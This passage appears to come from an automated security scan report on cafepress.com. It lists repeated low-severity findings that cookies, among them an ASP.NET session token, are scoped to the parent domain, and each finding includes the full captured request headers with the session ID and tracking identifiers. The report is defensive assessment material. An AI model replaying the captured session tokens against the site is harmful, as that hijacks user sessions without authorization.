Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.17. http://www.cafepress.com/+framed-prints previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+framed-prints

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.18. http://www.cafepress.com/+greeting_cards previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+greeting_cards

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.19. http://www.cafepress.com/+hats-caps previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+hats-caps

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.20. http://www.cafepress.com/+ipad-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+ipad-cases

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.21. http://www.cafepress.com/+iphone-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+iphone-cases

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.22. http://www.cafepress.com/+journals previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+journals

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.23. http://www.cafepress.com/+keepsake_boxes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+keepsake_boxes

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.24. http://www.cafepress.com/+license_plate_frames previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+license_plate_frames

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
